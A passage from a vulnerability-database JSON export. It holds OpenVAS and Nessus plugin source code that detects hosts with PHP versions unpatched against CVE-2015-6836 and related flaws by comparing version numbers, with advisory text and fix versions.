script_bugtraq_id(76644);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-20 10:21:00 +0100 (Tue, 20 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-01 16:56:54 +0530 (Tue, 01 Mar 2016)\");\n script_name(\"PHP 'serialize_function_call' Function Type Confusion Vulnerability - Mar16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to remote code 
execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists because the 'SoapClient __call'\n method in the 'ext/soap/soap.c' script does not properly manage headers.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows\n remote attackers to execute arbitrary code in the context of the user\n running the affected application. Failed exploit attempts will likely cause\n a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.4.45, 5.5.x before\n 5.5.29, and 5.6.x before 5.6.13 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.4.45, or 5.5.29, or\n 5.6.13 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"https://bugs.php.net/bug.php?id=70388\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! 
phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(version_is_less(version:phpVer, test_version:\"5.4.45\"))\n{\n fix = '5.4.45';\n VULN = TRUE;\n}\n\nelse if(phpVer =~ \"^5\\.6\")\n{\n if(version_is_less(version:phpVer, test_version:\"5.6.13\"))\n {\n fix = '5.6.13';\n VULN = TRUE;\n }\n}\n\nelse if(phpVer =~ \"^5\\.5\")\n{\n if(version_is_less(version:phpVer, test_version:\"5.5.29\"))\n {\n fix = '5.5.29';\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:phpVer, fixed_version:fix);\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:34", "description": "This host is installed with PHP and is prone\n to remote code execution vulnerability.", "cvss3": {}, "published": "2016-03-01T00:00:00", "type": "openvas", "title": "PHP 'serialize_function_call' Function Type Confusion Vulnerability - Mar16 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6836"], "modified": "2018-11-15T00:00:00", "id": "OPENVAS:1361412562310807091", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807091", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_type_confusion_rce_vuln_mar16_win.nasl 2016-03-01 16:56:54Z March$\n#\n# PHP 'serialize_function_call' Function Type Confusion Vulnerability - Mar16 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807091\");\n script_version(\"$Revision: 12363 $\");\n script_cve_id(\"CVE-2015-6836\");\n script_bugtraq_id(76644);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-15 10:51:15 +0100 (Thu, 15 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-01 16:56:54 +0530 (Tue, 01 Mar 2016)\");\n script_name(\"PHP 'serialize_function_call' Function Type Confusion Vulnerability - Mar16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with PHP and is prone\n to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists because the 'SoapClient __call'\n method in the 'ext/soap/soap.c' script does not properly manage headers.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows\n remote attackers to execute arbitrary code in the context of the user\n running the affected application. 
Failed exploit attempts will likely cause\n a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"PHP versions before 5.4.45, 5.5.x before\n 5.5.29, and 5.6.x before 5.6.13 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP version 5.4.45, or 5.5.29, or\n 5.6.13 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php\");\n script_xref(name:\"URL\", value:\"https://bugs.php.net/bug.php?id=70388\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_php_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"php/installed\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( phpPort = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! 
phpVer = get_app_version( cpe:CPE, port:phpPort ) ) exit( 0 );\n\nif(version_is_less(version:phpVer, test_version:\"5.4.45\"))\n{\n fix = '5.4.45';\n VULN = TRUE;\n}\n\nelse if(phpVer =~ \"^5\\.6\")\n{\n if(version_is_less(version:phpVer, test_version:\"5.6.13\"))\n {\n fix = '5.6.13';\n VULN = TRUE;\n }\n}\n\nelse if(phpVer =~ \"^5\\.5\")\n{\n if(version_is_less(version:phpVer, test_version:\"5.5.29\"))\n {\n fix = '5.5.29';\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:phpVer, fixed_version:fix);\n security_message(data:report, port:phpPort);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:34:23", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-1543)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-2348", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-2783", "CVE-2015-8873", "CVE-2015-3329", "CVE-2015-6834", "CVE-2015-0273", "CVE-2014-8142", "CVE-2015-4025", "CVE-2014-3669", "CVE-2014-5120", "CVE-2014-3597", "CVE-2015-6836", "CVE-2015-4026", "CVE-2014-4721", "CVE-2015-4022", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-4643"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191543", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191543", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1543\");\n script_version(\"2020-01-23T12:09:56+0000\");\n script_cve_id(\"CVE-2014-3597\", \"CVE-2014-3669\", \"CVE-2014-4721\", \"CVE-2014-5120\", \"CVE-2014-8142\", \"CVE-2015-0232\", \"CVE-2015-0273\", \"CVE-2015-2348\", \"CVE-2015-2783\", \"CVE-2015-2787\", \"CVE-2015-3329\", \"CVE-2015-4022\", \"CVE-2015-4025\", \"CVE-2015-4026\", \"CVE-2015-4643\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-8873\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:09:56 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:09:56 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for php (EulerOS-SA-2019-1543)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1543\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1543\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 
Huawei EulerOS\n 'php' package(s) announced via the EulerOS-SA-2019-1543 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2014-8142)\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.(CVE-2015-4026)\n\nA flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6834)\n\nIt was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.(CVE-2015-4025)\n\nAn integer overflow flaw was found in the way custom objects were unserialized. Specially crafted input processed by the unserialize() function could cause a PHP application to crash.(CVE-2014-3669)\n\nIt was found that PHP's move_uploaded_file() function did not properly handle file names with a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.(CVE-2015-2348)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. 
A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-4022)\n\nA flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6836)\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.(CVE-2015-6837)\n\nIt was found that PHP's gd extension did not properly handle file names with a null character. A remote attacker could possibly use this flaw to make a PHP application access unexpected files and bypass intended file system access restrictions.(CVE-2014-5120)\n\nA flaw was discovered in the way PHP performed obj ...\n\n Description truncated. 
Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'php' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.16~45.h9\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.4.16~45.h9\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.4.16~45.h9\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-11T15:39:06", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-05-15T00:00:00", "type": "openvas", "title": "Apple Mac OS X Multiple Vulnerabilities-01 (HT205375)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6976", "CVE-2015-6980", "CVE-2015-0235", "CVE-2015-5927", "CVE-2015-7003", "CVE-2015-5924", "CVE-2015-5939", "CVE-2015-6834", "CVE-2015-6991", "CVE-2015-6992", "CVE-2015-6977", "CVE-2015-7024", "CVE-2015-5934", "CVE-2015-5940", "CVE-2015-0273", "CVE-2014-4860", "CVE-2015-6978", "CVE-2015-7018", "CVE-2015-6985", "CVE-2015-7010", "CVE-2015-6984", "CVE-2015-5937", "CVE-2015-6993", "CVE-2015-6836", "CVE-2015-5936", "CVE-2015-5942", "CVE-2015-7009", "CVE-2015-6996", "CVE-2015-6837", "CVE-2015-5925", 
"CVE-2015-6835", "CVE-2015-5926", "CVE-2015-6838", "CVE-2015-5933"], "modified": "2020-02-11T00:00:00", "id": "OPENVAS:1361412562310813191", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813191", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-01 (HT205375)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813191\");\n script_version(\"2020-02-11T08:37:57+0000\");\n script_cve_id(\"CVE-2014-4860\", \"CVE-2015-0235\", \"CVE-2015-0273\", \"CVE-2015-5924\",\n \"CVE-2015-5925\", \"CVE-2015-5926\", \"CVE-2015-5927\", \"CVE-2015-5933\",\n \"CVE-2015-5934\", \"CVE-2015-5936\", \"CVE-2015-5937\", \"CVE-2015-5939\",\n \"CVE-2015-5940\", \"CVE-2015-5942\", \"CVE-2015-6834\", \"CVE-2015-6835\",\n \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\", \"CVE-2015-6976\",\n \"CVE-2015-6977\", \"CVE-2015-6978\", \"CVE-2015-6980\", \"CVE-2015-6984\",\n \"CVE-2015-6985\", \"CVE-2015-6991\", \"CVE-2015-6992\", \"CVE-2015-6993\",\n \"CVE-2015-6996\", 
\"CVE-2015-7003\", \"CVE-2015-7009\", \"CVE-2015-7010\",\n \"CVE-2015-7018\", \"CVE-2015-7024\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-11 08:37:57 +0000 (Tue, 11 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 15:17:32 +0530 (Tue, 15 May 2018)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-01 (HT205375)\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details refer\n reference section.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code, unexpected application termination, exercise unused\n EFI functions, overwrite arbitrary files and load arbitrary files.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions 10.9.x through\n 10.9.5 prior to build 13F1134, 10.10.x through 10.10.5 prior to build 14F1021,\n and 10.11.x prior to 10.11.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade 10.11.x Apple Mac OS X to version\n 10.11.1 or apply the appropriate patch for 10.10.x and 10.9.x Apple Mac OS X\n versions. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT205375\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.(9|1[01])\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.(9|1[01])\"){\n exit(0);\n}\n\nif(osVer =~ \"^10\\.(9|10)\")\n{\n if(version_in_range(version:osVer, test_version:\"10.9\", test_version2:\"10.9.4\") ||\n version_in_range(version:osVer, test_version:\"10.10\", test_version2:\"10.10.4\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.9.5\" || osVer == \"10.10.5\")\n {\n buildVer = get_kb_item(\"ssh/login/osx_build\");\n if(buildVer)\n {\n if((osVer == \"10.9.5\" && version_is_less(version:buildVer, test_version:\"13F1134\")) ||\n (osVer == \"10.10.5\" && version_is_less(version:buildVer, test_version:\"14F1021\")))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n }\n}\n\nelse if(osVer =~ \"^10\\.11\" && version_is_less(version:osVer, test_version:\"10.11.1\")){\n fix = \"10.11.1\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-10-16T01:30:44", "description": "A NULL pointer dereference flaw was found in the 
XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.\n(CVE-2015-6837 , CVE-2015-6838)\n\nA flaw was discovered in the way PHP performed object unserialization.\nSpecially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-6834 , CVE-2015-6835 , CVE-2015-6836)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-03-17T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : php54 (ALAS-2016-670)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2019-04-11T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php54", "p-cpe:/a:amazon:linux:php54-bcmath", "p-cpe:/a:amazon:linux:php54-cli", "p-cpe:/a:amazon:linux:php54-common", "p-cpe:/a:amazon:linux:php54-dba", "p-cpe:/a:amazon:linux:php54-debuginfo", "p-cpe:/a:amazon:linux:php54-devel", "p-cpe:/a:amazon:linux:php54-embedded", "p-cpe:/a:amazon:linux:php54-enchant", "p-cpe:/a:amazon:linux:php54-fpm", "p-cpe:/a:amazon:linux:php54-gd", "p-cpe:/a:amazon:linux:php54-imap", "p-cpe:/a:amazon:linux:php54-intl", "p-cpe:/a:amazon:linux:php54-ldap", "p-cpe:/a:amazon:linux:php54-mbstring", "p-cpe:/a:amazon:linux:php54-mcrypt", "p-cpe:/a:amazon:linux:php54-mssql", "p-cpe:/a:amazon:linux:php54-mysql", "p-cpe:/a:amazon:linux:php54-mysqlnd", "p-cpe:/a:amazon:linux:php54-odbc", "p-cpe:/a:amazon:linux:php54-pdo", "p-cpe:/a:amazon:linux:php54-pgsql", "p-cpe:/a:amazon:linux:php54-process", "p-cpe:/a:amazon:linux:php54-pspell", "p-cpe:/a:amazon:linux:php54-recode", "p-cpe:/a:amazon:linux:php54-snmp", "p-cpe:/a:amazon:linux:php54-soap", "p-cpe:/a:amazon:linux:php54-tidy", 
"p-cpe:/a:amazon:linux:php54-xml", "p-cpe:/a:amazon:linux:php54-xmlrpc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-670.NASL", "href": "https://www.tenable.com/plugins/nessus/89967", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-670.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89967);\n script_version(\"2.4\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_xref(name:\"ALAS\", value:\"2016-670\");\n\n script_name(english:\"Amazon Linux AMI : php54 (ALAS-2016-670)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A NULL pointer dereference flaw was found in the XSLTProcessor class\nin PHP. 
An attacker could use this flaw to cause a PHP application to\ncrash if it performed Extensible Stylesheet Language (XSL)\ntransformations using untrusted XSLT files and allowed the use of PHP\nfunctions to be used as XSLT functions within XSL stylesheets.\n(CVE-2015-6837 , CVE-2015-6838)\n\nA flaw was discovered in the way PHP performed object unserialization.\nSpecially crafted input processed by the unserialize() function could\ncause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-6834 , CVE-2015-6835 , CVE-2015-6836)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-670.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php54' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:php54-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-xmlrpc\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", 